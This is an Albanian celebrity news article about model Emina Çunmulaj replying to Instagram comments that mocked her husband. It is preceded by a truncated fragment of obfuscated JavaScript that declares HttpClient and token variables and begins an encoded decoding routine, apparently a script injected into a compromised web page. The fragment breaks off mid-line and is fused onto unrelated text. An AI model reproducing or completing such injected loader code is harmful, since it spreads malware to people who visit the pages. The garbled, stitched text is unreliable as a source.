;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Mori komente negative për bashkëshortin – Emina Çunmulaj ka vetëm një përgjigje për të gjitha

By
Një fotografi e publikuar nga pushimet në Aspen të Kolorados në SHBA, doli të jetë mollë sherri në mes modeles Emina Çunmulaj dhe ndjekësve në Instagram. Modelja e njohur ka marrë ca komente negative për bashkëshortin të cilave nuk ka hezituar t’iu bëjë replikë. Njëra nga komentueset, ka shkruar me ironi se nuk e di nëse po sheh në fotografi një çift pra burrë dhe grua, apo një baba me vajzën e tij në këtë imazh.
Publikon foton me bashkëshortin, Emina Çunmulajn e vërshojnë komentet: “E ke baba? E bukura dhe bisha”
“E ti këtë në foton tënde çfarë e ke, gjysh?”, ka qenë replika e modeles karshi saj. Ndërsa më pas, edhe një tjetër komentues ka shkruar në profilin e saj kështu: “Ka ndryshuar përralla, është e bukura dhe pasaniku”. E këtij Emina i përgjigjet: “Pate me dashtë me qenë me të bukurën dhe me qenë pasanik, po s’mundesh. Shko e largoju muhabetit të grave të këqija dhe gjej ndonjë punë se i thave kafenetë e lagjes duke pi nga një kafe gjithë ditën e gjatë”. Ndërsa përfundimisht, Emina ka publikuar një fotografi nga këto pushime dhe përshkrimi që ka vendosur ta lë aty, është një përgjigje për të gjitha komentet negative që mori. “Dhe kështu ajo vazhdoi ta jetonte jetën që donte. Fund”, ka shkruar modelja.

Artikuj të ngjashëm